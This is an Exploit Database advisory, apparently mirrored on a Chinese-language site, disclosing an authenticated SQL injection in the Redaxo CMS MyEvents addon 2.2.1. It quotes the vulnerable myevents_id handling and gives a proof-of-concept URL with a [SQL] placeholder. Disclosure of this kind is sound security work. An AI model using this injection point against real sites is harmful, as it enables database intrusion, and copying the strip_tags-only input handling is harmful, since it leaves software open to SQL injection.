Redaxo CMS Addon MyEvents 2.2.1 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： h0n1gsp3cht
  日期： 2018-03-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44261/

• # Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
  # Date: 01.03.2018
  # Exploit Author: h0n1gsp3cht
  # Vendor Homepage: http://www.github.com/wende60/myevents
  # Version: 2.2.1 (Last Version)
  # Tested on: LinuxMint
  # More: Login Required
  # GET
  
  ##############
  Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
  ##############
  
  $myevents_id=strip_tags(rex_request('myevents_id', 'string'));
  
  ###############
  POC
  ###############
  
  http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]